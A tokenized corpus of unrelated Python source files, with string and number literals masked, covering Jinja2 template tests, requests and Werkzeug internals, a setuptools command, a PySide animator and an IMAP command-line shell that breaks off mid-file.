from_string ( '<STR_LIT>' ) <EOL> self . assert_raises ( TypeError , tmpl . render ) <EOL> def test_recursive ( self ) : <EOL> tmpl = env . from_string ( '''<STR_LIT>''' ) <EOL> assert tmpl . render ( seq = [ <EOL> dict ( a = <NUM_LIT:1> , b = [ dict ( a = <NUM_LIT:1> ) , dict ( a = <NUM_LIT:2> ) ] ) , <EOL> dict ( a = <NUM_LIT:2> , b = [ dict ( a = <NUM_LIT:1> ) , dict ( a = <NUM_LIT:2> ) ] ) , <EOL> dict ( a = <NUM_LIT:3> , b = [ dict ( a = '<STR_LIT:a>' ) ] ) <EOL> ] ) == '<STR_LIT>' <EOL> def test_recursive_depth0 ( self ) : <EOL> tmpl = env . from_string ( '''<STR_LIT>''' ) <EOL> self . assertEqual ( tmpl . render ( seq = [ <EOL> dict ( a = <NUM_LIT:1> , b = [ dict ( a = <NUM_LIT:1> ) , dict ( a = <NUM_LIT:2> ) ] ) , <EOL> dict ( a = <NUM_LIT:2> , b = [ dict ( a = <NUM_LIT:1> ) , dict ( a = <NUM_LIT:2> ) ] ) , <EOL> dict ( a = <NUM_LIT:3> , b = [ dict ( a = '<STR_LIT:a>' ) ] ) <EOL> ] ) , '<STR_LIT>' ) <EOL> def test_recursive_depth ( self ) : <EOL> tmpl = env . from_string ( '''<STR_LIT>''' ) <EOL> self . assertEqual ( tmpl . render ( seq = [ <EOL> dict ( a = <NUM_LIT:1> , b = [ dict ( a = <NUM_LIT:1> ) , dict ( a = <NUM_LIT:2> ) ] ) , <EOL> dict ( a = <NUM_LIT:2> , b = [ dict ( a = <NUM_LIT:1> ) , dict ( a = <NUM_LIT:2> ) ] ) , <EOL> dict ( a = <NUM_LIT:3> , b = [ dict ( a = '<STR_LIT:a>' ) ] ) <EOL> ] ) , '<STR_LIT>' ) <EOL> def test_looploop ( self ) : <EOL> tmpl = env . from_string ( '''<STR_LIT>''' ) <EOL> assert tmpl . render ( table = [ '<STR_LIT>' , '<STR_LIT>' ] ) == '<STR_LIT>' <EOL> def test_reversed_bug ( self ) : <EOL> tmpl = env . from_string ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> assert tmpl . render ( items = reversed ( [ <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:1> ] ) ) == '<STR_LIT>' <EOL> def test_loop_errors ( self ) : <EOL> tmpl = env . from_string ( '''<STR_LIT>''' ) <EOL> self . assert_raises ( UndefinedError , tmpl . render ) <EOL> tmpl = env . from_string ( '''<STR_LIT>''' ) <EOL> assert tmpl . render ( ) == '<STR_LIT>' <EOL> def test_loop_filter ( self ) : <EOL> tmpl = env . from_string ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> assert tmpl . render ( ) == '<STR_LIT>' <EOL> tmpl = env . from_string ( '''<STR_LIT>''' ) <EOL> assert tmpl . render ( ) == '<STR_LIT>' <EOL> def test_loop_unassignable ( self ) : <EOL> self . assert_raises ( TemplateSyntaxError , env . from_string , <EOL> '<STR_LIT>' ) <EOL> def test_scoped_special_var ( self ) : <EOL> t = env . from_string ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> assert t . render ( seq = ( '<STR_LIT>' , '<STR_LIT>' ) ) == '<STR_LIT>' <EOL> def test_scoped_loop_var ( self ) : <EOL> t = env . from_string ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> assert t . render ( seq = '<STR_LIT>' ) == '<STR_LIT>' <EOL> t = env . from_string ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> assert t . render ( seq = '<STR_LIT>' ) == '<STR_LIT>' <EOL> def test_recursive_empty_loop_iter ( self ) : <EOL> t = env . from_string ( '''<STR_LIT>''' ) <EOL> assert t . render ( dict ( foo = [ ] ) ) == '<STR_LIT>' <EOL> def test_call_in_loop ( self ) : <EOL> t = env . from_string ( '''<STR_LIT>''' ) <EOL> assert t . render ( ) == '<STR_LIT>' <EOL> def test_scoping_bug ( self ) : <EOL> t = env . from_string ( '''<STR_LIT>''' ) <EOL> assert t . render ( foo = ( <NUM_LIT:1> , ) ) == '<STR_LIT>' <EOL> def test_unpacking ( self ) : <EOL> tmpl = env . from_string ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> assert tmpl . render ( ) == '<STR_LIT>' <EOL> class IfConditionTestCase ( JinjaTestCase ) : <EOL> def test_simple ( self ) : <EOL> tmpl = env . from_string ( '''<STR_LIT>''' ) <EOL> assert tmpl . render ( ) == '<STR_LIT>' <EOL> def test_elif ( self ) : <EOL> tmpl = env . from_string ( '''<STR_LIT>''' ) <EOL> assert tmpl . render ( ) == '<STR_LIT>' <EOL> def test_else ( self ) : <EOL> tmpl = env . from_string ( '<STR_LIT>' ) <EOL> assert tmpl . render ( ) == '<STR_LIT>' <EOL> def test_empty ( self ) : <EOL> tmpl = env . from_string ( '<STR_LIT>' ) <EOL> assert tmpl . render ( ) == '<STR_LIT>' <EOL> def test_complete ( self ) : <EOL> tmpl = env . from_string ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> assert tmpl . render ( a = <NUM_LIT:0> , b = False , c = <NUM_LIT> , d = <NUM_LIT> ) == '<STR_LIT:C>' <EOL> def test_no_scope ( self ) : <EOL> tmpl = env . from_string ( '<STR_LIT>' ) <EOL> assert tmpl . render ( a = True ) == '<STR_LIT:1>' <EOL> tmpl = env . from_string ( '<STR_LIT>' ) <EOL> assert tmpl . render ( ) == '<STR_LIT:1>' <EOL> class MacrosTestCase ( JinjaTestCase ) : <EOL> env = Environment ( trim_blocks = True ) <EOL> def test_simple ( self ) : <EOL> tmpl = self . env . from_string ( '''<STR_LIT>''' ) <EOL> assert tmpl . render ( ) == '<STR_LIT>' <EOL> def test_scoping ( self ) : <EOL> tmpl = self . env . from_string ( '''<STR_LIT>''' ) <EOL> assert tmpl . render ( ) == '<STR_LIT>' <EOL> def test_arguments ( self ) : <EOL> tmpl = self . env . from_string ( '''<STR_LIT>''' ) <EOL> assert tmpl . render ( ) == '<STR_LIT>' <EOL> def test_varargs ( self ) : <EOL> tmpl = self . env . from_string ( '''<STR_LIT>''' ) <EOL> assert tmpl . render ( ) == '<STR_LIT>' <EOL> def test_simple_call ( self ) : <EOL> tmpl = self . env . from_string ( '''<STR_LIT>''' ) <EOL> assert tmpl . render ( ) == '<STR_LIT>' <EOL> def test_complex_call ( self ) : <EOL> tmpl = self . env . from_string ( '''<STR_LIT>''' ) <EOL> assert tmpl . render ( ) == '<STR_LIT>' <EOL> def test_caller_undefined ( self ) : <EOL> tmpl = self . env . from_string ( '''<STR_LIT>''' ) <EOL> assert tmpl . render ( ) == '<STR_LIT:True>' <EOL> def test_include ( self ) : <EOL> self . env = Environment ( loader = DictLoader ( { '<STR_LIT>' : <EOL> '<STR_LIT>' } ) ) <EOL> tmpl = self . env . from_string ( '<STR_LIT>' ) <EOL> assert tmpl . render ( ) == '<STR_LIT>' <EOL> def test_macro_api ( self ) : <EOL> tmpl = self . env . from_string ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> assert tmpl . module . foo . arguments == ( '<STR_LIT:a>' , '<STR_LIT:b>' ) <EOL> assert tmpl . module . foo . defaults == ( ) <EOL> assert tmpl . module . foo . name == '<STR_LIT:foo>' <EOL> assert not tmpl . module . foo . caller <EOL> assert not tmpl . module . foo . catch_kwargs <EOL> assert not tmpl . module . foo . catch_varargs <EOL> assert tmpl . module . bar . arguments == ( ) <EOL> assert tmpl . module . bar . defaults == ( ) <EOL> assert not tmpl . module . bar . caller <EOL> assert tmpl . module . bar . catch_kwargs <EOL> assert tmpl . module . bar . catch_varargs <EOL> assert tmpl . module . baz . caller <EOL> def test_callself ( self ) : <EOL> tmpl = self . env . from_string ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> assert tmpl . render ( ) == '<STR_LIT>' <EOL> def suite ( ) : <EOL> suite = unittest . TestSuite ( ) <EOL> suite . addTest ( unittest . makeSuite ( ForLoopTestCase ) ) <EOL> suite . addTest ( unittest . makeSuite ( IfConditionTestCase ) ) <EOL> suite . addTest ( unittest . makeSuite ( MacrosTestCase ) ) <EOL> return suite </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import sys <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> try : <EOL> from imp import cache_from_source <EOL> except ImportError : <EOL> def cache_from_source ( py_file , debug = __debug__ ) : <EOL> ext = debug and '<STR_LIT:c>' or '<STR_LIT:o>' <EOL> return py_file + ext <EOL> try : <EOL> callable = callable <EOL> except NameError : <EOL> from collections import Callable <EOL> def callable ( obj ) : <EOL> return isinstance ( obj , Callable ) <EOL> try : <EOL> fsencode = os . fsencode <EOL> except AttributeError : <EOL> def fsencode ( filename ) : <EOL> if isinstance ( filename , bytes ) : <EOL> return filename <EOL> elif isinstance ( filename , str ) : <EOL> return filename . encode ( sys . getfilesystemencoding ( ) ) <EOL> else : <EOL> raise TypeError ( "<STR_LIT>" % <EOL> type ( filename ) . __name__ ) </s>
<s> """<STR_LIT>""" <EOL> from . packages import chardet <EOL> import sys <EOL> _ver = sys . version_info <EOL> is_py2 = ( _ver [ <NUM_LIT:0> ] == <NUM_LIT:2> ) <EOL> is_py3 = ( _ver [ <NUM_LIT:0> ] == <NUM_LIT:3> ) <EOL> is_py30 = ( is_py3 and _ver [ <NUM_LIT:1> ] == <NUM_LIT:0> ) <EOL> is_py31 = ( is_py3 and _ver [ <NUM_LIT:1> ] == <NUM_LIT:1> ) <EOL> is_py32 = ( is_py3 and _ver [ <NUM_LIT:1> ] == <NUM_LIT:2> ) <EOL> is_py33 = ( is_py3 and _ver [ <NUM_LIT:1> ] == <NUM_LIT:3> ) <EOL> is_py34 = ( is_py3 and _ver [ <NUM_LIT:1> ] == <NUM_LIT:4> ) <EOL> is_py27 = ( is_py2 and _ver [ <NUM_LIT:1> ] == <NUM_LIT:7> ) <EOL> is_py26 = ( is_py2 and _ver [ <NUM_LIT:1> ] == <NUM_LIT:6> ) <EOL> is_py25 = ( is_py2 and _ver [ <NUM_LIT:1> ] == <NUM_LIT:5> ) <EOL> is_py24 = ( is_py2 and _ver [ <NUM_LIT:1> ] == <NUM_LIT:4> ) <EOL> _ver = sys . version . lower ( ) <EOL> is_pypy = ( '<STR_LIT>' in _ver ) <EOL> is_jython = ( '<STR_LIT>' in _ver ) <EOL> is_ironpython = ( '<STR_LIT>' in _ver ) <EOL> is_cpython = not any ( ( is_pypy , is_jython , is_ironpython ) ) <EOL> is_windows = '<STR_LIT:win32>' in str ( sys . platform ) . lower ( ) <EOL> is_linux = ( '<STR_LIT>' in str ( sys . platform ) . lower ( ) ) <EOL> is_osx = ( '<STR_LIT>' in str ( sys . platform ) . lower ( ) ) <EOL> is_hpux = ( '<STR_LIT>' in str ( sys . platform ) . lower ( ) ) <EOL> is_solaris = ( '<STR_LIT>' in str ( sys . platform ) . lower ( ) ) <EOL> try : <EOL> import simplejson as json <EOL> except ImportError : <EOL> import json <EOL> if is_py2 : <EOL> from urllib import quote , unquote , quote_plus , unquote_plus , urlencode , getproxies , proxy_bypass <EOL> from urlparse import urlparse , urlunparse , urljoin , urlsplit , urldefrag <EOL> from urllib2 import parse_http_list <EOL> import cookielib <EOL> from Cookie import Morsel <EOL> from StringIO import StringIO <EOL> from . packages . urllib3 . packages . ordered_dict import OrderedDict <EOL> from httplib import IncompleteRead <EOL> builtin_str = str <EOL> bytes = str <EOL> str = unicode <EOL> basestring = basestring <EOL> numeric_types = ( int , long , float ) <EOL> elif is_py3 : <EOL> from urllib . parse import urlparse , urlunparse , urljoin , urlsplit , urlencode , quote , unquote , quote_plus , unquote_plus , urldefrag <EOL> from urllib . request import parse_http_list , getproxies , proxy_bypass <EOL> from http import cookiejar as cookielib <EOL> from http . cookies import Morsel <EOL> from io import StringIO <EOL> from collections import OrderedDict <EOL> from http . client import IncompleteRead <EOL> builtin_str = str <EOL> str = str <EOL> bytes = bytes <EOL> basestring = ( str , bytes ) <EOL> numeric_types = ( int , float ) </s>
<s> import sys <EOL> import os <EOL> def run ( ) : <EOL> base = os . path . dirname ( os . path . dirname ( os . path . abspath ( __file__ ) ) ) <EOL> sys . path . insert ( <NUM_LIT:0> , base ) <EOL> import pip <EOL> return pip . main ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> exit = run ( ) <EOL> if exit : <EOL> sys . exit ( exit ) </s>
<s> import distutils , os <EOL> from setuptools import Command <EOL> from setuptools . compat import basestring <EOL> from distutils . util import convert_path <EOL> from distutils import log <EOL> from distutils . errors import * <EOL> class rotate ( Command ) : <EOL> """<STR_LIT>""" <EOL> description = "<STR_LIT>" <EOL> user_options = [ <EOL> ( '<STR_LIT>' , '<STR_LIT:m>' , "<STR_LIT>" ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:d>' , "<STR_LIT>" ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:k>' , "<STR_LIT>" ) , <EOL> ] <EOL> boolean_options = [ ] <EOL> def initialize_options ( self ) : <EOL> self . match = None <EOL> self . dist_dir = None <EOL> self . keep = None <EOL> def finalize_options ( self ) : <EOL> if self . match is None : <EOL> raise DistutilsOptionError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> if self . keep is None : <EOL> raise DistutilsOptionError ( "<STR_LIT>" ) <EOL> try : <EOL> self . keep = int ( self . keep ) <EOL> except ValueError : <EOL> raise DistutilsOptionError ( "<STR_LIT>" ) <EOL> if isinstance ( self . match , basestring ) : <EOL> self . match = [ <EOL> convert_path ( p . strip ( ) ) for p in self . match . split ( '<STR_LIT:U+002C>' ) <EOL> ] <EOL> self . set_undefined_options ( '<STR_LIT>' , ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> def run ( self ) : <EOL> self . run_command ( "<STR_LIT>" ) <EOL> from glob import glob <EOL> for pattern in self . match : <EOL> pattern = self . distribution . get_name ( ) + '<STR_LIT:*>' + pattern <EOL> files = glob ( os . path . join ( self . dist_dir , pattern ) ) <EOL> files = [ ( os . path . getmtime ( f ) , f ) for f in files ] <EOL> files . sort ( ) <EOL> files . reverse ( ) <EOL> log . info ( "<STR_LIT>" , len ( files ) , pattern ) <EOL> files = files [ self . keep : ] <EOL> for ( t , f ) in files : <EOL> log . info ( "<STR_LIT>" , f ) <EOL> if not self . dry_run : <EOL> os . unlink ( f ) </s>
<s> result = '<STR_LIT>' </s>
<s> """<STR_LIT>""" <EOL> import sys , time , os . path <EOL> try : <EOL> try : <EOL> from cProfile import Profile <EOL> except ImportError : <EOL> from profile import Profile <EOL> from pstats import Stats <EOL> available = True <EOL> except ImportError : <EOL> available = False <EOL> class MergeStream ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * streams ) : <EOL> if not streams : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> self . streams = streams <EOL> def write ( self , data ) : <EOL> for stream in self . streams : <EOL> stream . write ( data ) <EOL> class ProfilerMiddleware ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , app , stream = None , <EOL> sort_by = ( '<STR_LIT:time>' , '<STR_LIT>' ) , restrictions = ( ) , profile_dir = None ) : <EOL> if not available : <EOL> raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . _app = app <EOL> self . _stream = stream or sys . stdout <EOL> self . _sort_by = sort_by <EOL> self . _restrictions = restrictions <EOL> self . _profile_dir = profile_dir <EOL> def __call__ ( self , environ , start_response ) : <EOL> response_body = [ ] <EOL> def catching_start_response ( status , headers , exc_info = None ) : <EOL> start_response ( status , headers , exc_info ) <EOL> return response_body . append <EOL> def runapp ( ) : <EOL> appiter = self . _app ( environ , catching_start_response ) <EOL> response_body . extend ( appiter ) <EOL> if hasattr ( appiter , '<STR_LIT>' ) : <EOL> appiter . close ( ) <EOL> p = Profile ( ) <EOL> start = time . time ( ) <EOL> p . runcall ( runapp ) <EOL> body = b'<STR_LIT>' . join ( response_body ) <EOL> elapsed = time . time ( ) - start <EOL> if self . _profile_dir is not None : <EOL> prof_filename = os . path . join ( self . _profile_dir , <EOL> '<STR_LIT>' % ( <EOL> environ [ '<STR_LIT>' ] , <EOL> environ . get ( '<STR_LIT>' ) . strip ( '<STR_LIT:/>' ) . replace ( '<STR_LIT:/>' , '<STR_LIT:.>' ) or '<STR_LIT:root>' , <EOL> elapsed * <NUM_LIT> , <EOL> time . time ( ) <EOL> ) ) <EOL> p . dump_stats ( prof_filename ) <EOL> else : <EOL> stats = Stats ( p , stream = self . _stream ) <EOL> stats . sort_stats ( * self . _sort_by ) <EOL> self . _stream . write ( '<STR_LIT:->' * <NUM_LIT> ) <EOL> self . _stream . write ( '<STR_LIT>' % environ . get ( '<STR_LIT>' ) ) <EOL> stats . print_stats ( * self . _restrictions ) <EOL> self . _stream . write ( '<STR_LIT:->' * <NUM_LIT> + '<STR_LIT>' ) <EOL> return [ body ] <EOL> def make_action ( app_factory , hostname = '<STR_LIT:localhost>' , port = <NUM_LIT> , <EOL> threaded = False , processes = <NUM_LIT:1> , stream = None , <EOL> sort_by = ( '<STR_LIT:time>' , '<STR_LIT>' ) , restrictions = ( ) ) : <EOL> """<STR_LIT>""" <EOL> def action ( hostname = ( '<STR_LIT:h>' , hostname ) , port = ( '<STR_LIT:p>' , port ) , <EOL> threaded = threaded , processes = processes ) : <EOL> """<STR_LIT>""" <EOL> from werkzeug . serving import run_simple <EOL> app = ProfilerMiddleware ( app_factory ( ) , stream , sort_by , restrictions ) <EOL> run_simple ( hostname , port , app , False , None , threaded , processes ) <EOL> return action </s>
<s> """<STR_LIT>""" <EOL> import unittest <EOL> from werkzeug . testsuite import WerkzeugTestCase <EOL> from werkzeug import exceptions <EOL> from werkzeug . wrappers import Response <EOL> from werkzeug . _compat import text_type <EOL> class ExceptionsTestCase ( WerkzeugTestCase ) : <EOL> def test_proxy_exception ( self ) : <EOL> orig_resp = Response ( '<STR_LIT>' ) <EOL> try : <EOL> exceptions . abort ( orig_resp ) <EOL> except exceptions . HTTPException as e : <EOL> resp = e . get_response ( { } ) <EOL> else : <EOL> self . fail ( '<STR_LIT>' ) <EOL> self . assert_true ( resp is orig_resp ) <EOL> self . assert_equal ( resp . get_data ( ) , b'<STR_LIT>' ) <EOL> def test_aborter ( self ) : <EOL> abort = exceptions . abort <EOL> self . assert_raises ( exceptions . BadRequest , abort , <NUM_LIT> ) <EOL> self . assert_raises ( exceptions . Unauthorized , abort , <NUM_LIT> ) <EOL> self . assert_raises ( exceptions . Forbidden , abort , <NUM_LIT> ) <EOL> self . assert_raises ( exceptions . NotFound , abort , <NUM_LIT> ) <EOL> self . assert_raises ( exceptions . MethodNotAllowed , abort , <NUM_LIT> , [ '<STR_LIT:GET>' , '<STR_LIT>' ] ) <EOL> self . assert_raises ( exceptions . NotAcceptable , abort , <NUM_LIT> ) <EOL> self . assert_raises ( exceptions . RequestTimeout , abort , <NUM_LIT> ) <EOL> self . assert_raises ( exceptions . Gone , abort , <NUM_LIT> ) <EOL> self . assert_raises ( exceptions . LengthRequired , abort , <NUM_LIT> ) <EOL> self . assert_raises ( exceptions . PreconditionFailed , abort , <NUM_LIT> ) <EOL> self . assert_raises ( exceptions . RequestEntityTooLarge , abort , <NUM_LIT> ) <EOL> self . assert_raises ( exceptions . RequestURITooLarge , abort , <NUM_LIT> ) <EOL> self . assert_raises ( exceptions . UnsupportedMediaType , abort , <NUM_LIT> ) <EOL> self . assert_raises ( exceptions . UnprocessableEntity , abort , <NUM_LIT> ) <EOL> self . assert_raises ( exceptions . InternalServerError , abort , <NUM_LIT> ) <EOL> self . assert_raises ( exceptions . NotImplemented , abort , <NUM_LIT> ) <EOL> self . assert_raises ( exceptions . BadGateway , abort , <NUM_LIT> ) <EOL> self . assert_raises ( exceptions . ServiceUnavailable , abort , <NUM_LIT> ) <EOL> myabort = exceptions . Aborter ( { <NUM_LIT:1> : exceptions . NotFound } ) <EOL> self . assert_raises ( LookupError , myabort , <NUM_LIT> ) <EOL> self . assert_raises ( exceptions . NotFound , myabort , <NUM_LIT:1> ) <EOL> myabort = exceptions . Aborter ( extra = { <NUM_LIT:1> : exceptions . NotFound } ) <EOL> self . assert_raises ( exceptions . NotFound , myabort , <NUM_LIT> ) <EOL> self . assert_raises ( exceptions . NotFound , myabort , <NUM_LIT:1> ) <EOL> def test_exception_repr ( self ) : <EOL> exc = exceptions . NotFound ( ) <EOL> self . assert_equal ( text_type ( exc ) , '<STR_LIT>' ) <EOL> self . assert_equal ( repr ( exc ) , "<STR_LIT>" ) <EOL> exc = exceptions . NotFound ( '<STR_LIT>' ) <EOL> self . assert_equal ( text_type ( exc ) , '<STR_LIT>' ) <EOL> self . assert_equal ( repr ( exc ) , "<STR_LIT>" ) <EOL> def test_special_exceptions ( self ) : <EOL> exc = exceptions . MethodNotAllowed ( [ '<STR_LIT:GET>' , '<STR_LIT>' , '<STR_LIT:POST>' ] ) <EOL> h = dict ( exc . get_headers ( { } ) ) <EOL> self . assert_equal ( h [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assert_true ( '<STR_LIT>' in exc . get_description ( ) ) <EOL> def suite ( ) : <EOL> suite = unittest . TestSuite ( ) <EOL> suite . addTest ( unittest . makeSuite ( ExceptionsTestCase ) ) <EOL> return suite </s>
<s> fileName = '<STR_LIT>' <EOL> WRITE = '<STR_LIT:w>' <EOL> APPEND = '<STR_LIT:a>' <EOL> data = input ( '<STR_LIT>' ) <EOL> file = open ( fileName , mode = WRITE ) <EOL> file . write ( data ) <EOL> file . close ( ) <EOL> print ( '<STR_LIT>' ) </s>
<s> __author__ = "<STR_LIT>" <EOL> import abc <EOL> from threading import Thread <EOL> from PySide . QtCore import Signal , QObject , QPoint <EOL> class MAnimator ( QObject ) : <EOL> __metaclass__ = abc . ABCMeta <EOL> start_signal = Signal ( ) <EOL> pause_signal = Signal ( ) <EOL> end_signal = Signal ( ) <EOL> resume_signal = Signal ( ) <EOL> cancel_signal = Signal ( ) <EOL> def __init__ ( self ) : <EOL> QObject . __init__ ( self ) <EOL> self . __paused = False <EOL> self . __started = False <EOL> self . __running = False <EOL> self . __target = None <EOL> self . __can_run_reversed = False <EOL> self . __run_reversed = False <EOL> self . __cancel = False <EOL> self . __end = False <EOL> self . __start_delay = <NUM_LIT:0> <EOL> self . __duration = <NUM_LIT:1000> <EOL> self . __shapes = [ ] <EOL> self . __fps = <NUM_LIT> <EOL> def start ( self ) : <EOL> """<STR_LIT>""" <EOL> self . started = True <EOL> t = Thread ( target = self . animate , args = ( self . __shapes , ) ) <EOL> t . start ( ) <EOL> @ abc . abstractmethod <EOL> def animate ( self , shape ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def cancel ( self ) : <EOL> """<STR_LIT>""" <EOL> self . canceled = True <EOL> def end ( self ) : <EOL> """<STR_LIT>""" <EOL> self . ended = True <EOL> def pause ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . running and not self . paused : <EOL> self . paused = True <EOL> def resume ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . __paused : <EOL> self . __paused = False <EOL> def add_target ( self , shape ) : <EOL> """<STR_LIT>""" <EOL> self . __shapes . append ( shape ) <EOL> def remove_target ( self , shape ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> self . __shapes . remove ( shape ) <EOL> return True <EOL> except ValueError : <EOL> return False <EOL> @ property <EOL> def started ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __started <EOL> @ started . setter <EOL> def started ( self , started ) : <EOL> self . __started = started <EOL> @ property <EOL> def canceled ( self ) : <EOL> return self . __cancel <EOL> @ canceled . setter <EOL> def canceled ( self , cancel ) : <EOL> self . __cancel = cancel <EOL> @ property <EOL> def ended ( self ) : <EOL> return self . __end <EOL> @ ended . setter <EOL> def ended ( self , end ) : <EOL> self . __end = end <EOL> @ property <EOL> def paused ( self ) : <EOL> return self . __paused <EOL> @ paused . setter <EOL> def paused ( self , paused ) : <EOL> self . __paused = paused <EOL> @ property <EOL> def duration ( self ) : <EOL> return self . __duration <EOL> @ duration . setter <EOL> def duration ( self , duration ) : <EOL> self . __duration = duration <EOL> @ property <EOL> def running ( self ) : <EOL> return self . __running <EOL> @ running . setter <EOL> def running ( self , is_it ) : <EOL> self . __running = is_it <EOL> @ property <EOL> def start_delay ( self ) : <EOL> return self . __start_delay <EOL> @ start_delay . setter <EOL> def start_delay ( self , delay ) : <EOL> self . __start_delay = delay / <NUM_LIT:1000> <EOL> @ property <EOL> def can_run_reversed ( self ) : <EOL> return self . __can_run_reversed <EOL> @ can_run_reversed . setter <EOL> def can_run_reversed ( self , can ) : <EOL> self . __can_run_reversed = can <EOL> @ property <EOL> def run_reversed ( self ) : <EOL> return self . __run_reversed <EOL> @ run_reversed . setter <EOL> def run_reversed ( self , run ) : <EOL> self . __run_reversed = run <EOL> @ property <EOL> def fps ( self ) : <EOL> return self . __fps <EOL> @ fps . setter <EOL> def fps ( self , fps ) : <EOL> self . __fps = fps <EOL> @ property <EOL> def target ( self ) : <EOL> return self . __target <EOL> @ target . setter <EOL> def target ( self , target ) : <EOL> self . __target = target </s>
<s> imports = [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] <EOL> buildcode = """<STR_LIT>""" <EOL> callcode = """<STR_LIT>""" </s>
<s> """<STR_LIT>""" <EOL> import argparse <EOL> import cmd <EOL> import datetime <EOL> import logging <EOL> import os <EOL> import sys <EOL> import tempfile <EOL> import threading <EOL> import time <EOL> import webbrowser <EOL> import docopt <EOL> import imap_cli <EOL> from imap_cli import config <EOL> from imap_cli import const <EOL> from imap_cli import copy <EOL> from imap_cli import fetch <EOL> from imap_cli import flag <EOL> from imap_cli import search <EOL> app_name = os . path . splitext ( os . path . basename ( __file__ ) ) [ <NUM_LIT:0> ] <EOL> keep_alive_bool = True <EOL> keep_alive_timer = <NUM_LIT:30> <EOL> log = logging . getLogger ( app_name ) <EOL> class ImapShell ( cmd . Cmd ) : <EOL> completekey = '<STR_LIT>' <EOL> intro = u'<STR_LIT>' . join ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> prompt = '<STR_LIT>' <EOL> stdout = sys . stdout <EOL> cmdqueue = [ ] <EOL> delete_conf = None <EOL> def __init__ ( self , imap_account ) : <EOL> self . imap_account = imap_account <EOL> def do_cd ( self , arg ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> args = docopt . docopt ( '<STR_LIT>' , arg ) <EOL> except SystemExit : <EOL> return <EOL> cd_result = imap_cli . change_dir ( self . imap_account , <EOL> directory = args [ '<STR_LIT>' ] ) <EOL> if cd_result == - <NUM_LIT:1> : <EOL> sys . stdout . write ( '<STR_LIT>' ) <EOL> else : <EOL> self . prompt = '<STR_LIT>' . format ( args [ '<STR_LIT>' ] ) <EOL> def do_cp ( self , arg ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> args = docopt . docopt ( '<STR_LIT>' , arg ) <EOL> except SystemExit : <EOL> return <EOL> copy . copy ( self . imap_account , args [ '<STR_LIT>' ] , args [ '<STR_LIT>' ] ) <EOL> def do_flag ( self , arg ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> args = docopt . docopt ( '<STR_LIT:\n>' . join ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) , argv = arg ) <EOL> except SystemExit : <EOL> return <EOL> flag . flag ( self . imap_account , [ args [ '<STR_LIT>' ] ] , args [ '<STR_LIT>' ] , <EOL> unset = args [ '<STR_LIT>' ] ) <EOL> def do_list ( self , arg ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> args = docopt . docopt ( '<STR_LIT:\n>' . join ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) , argv = arg ) <EOL> except SystemExit : <EOL> return <EOL> try : <EOL> limit = int ( args [ '<STR_LIT>' ] or <NUM_LIT:10> ) <EOL> except ValueError : <EOL> limit = <NUM_LIT:10> <EOL> for mail_info in search . fetch_mails_info ( self . imap_account , <EOL> limit = limit ) : <EOL> sys . stdout . write ( <EOL> u'<STR_LIT>' . format ( <EOL> mail_info [ '<STR_LIT>' ] , <EOL> mail_info [ '<STR_LIT>' ] , <EOL> mail_info [ '<STR_LIT>' ] ) ) <EOL> def do_mv ( self , arg ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> args = docopt . docopt ( '<STR_LIT>' , arg ) <EOL> except SystemExit : <EOL> return <EOL> copy . copy ( self . imap_account , args [ '<STR_LIT>' ] , args [ '<STR_LIT>' ] ) <EOL> flag . flag ( self . imap_account , args [ '<STR_LIT>' ] , [ const . FLAG_DELETED ] ) <EOL> self . imap_account . expunge ( ) <EOL> def do_quit ( self , arg ) : <EOL> '<STR_LIT>' <EOL> global keep_alive_bool <EOL> keep_alive_bool = False <EOL> imap_cli . disconnect ( self . imap_account ) <EOL> sys . stdout . write ( '<STR_LIT>' ) <EOL> return True <EOL> def do_rm ( self , arg ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> args = docopt . docopt ( '<STR_LIT>' , arg ) <EOL> except SystemExit : <EOL> return <EOL> if self . delete_conf [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> copy . copy ( self . imap_account , args [ '<STR_LIT>' ] , <EOL> self . delete_conf [ '<STR_LIT>' ] ) <EOL> flag . flag 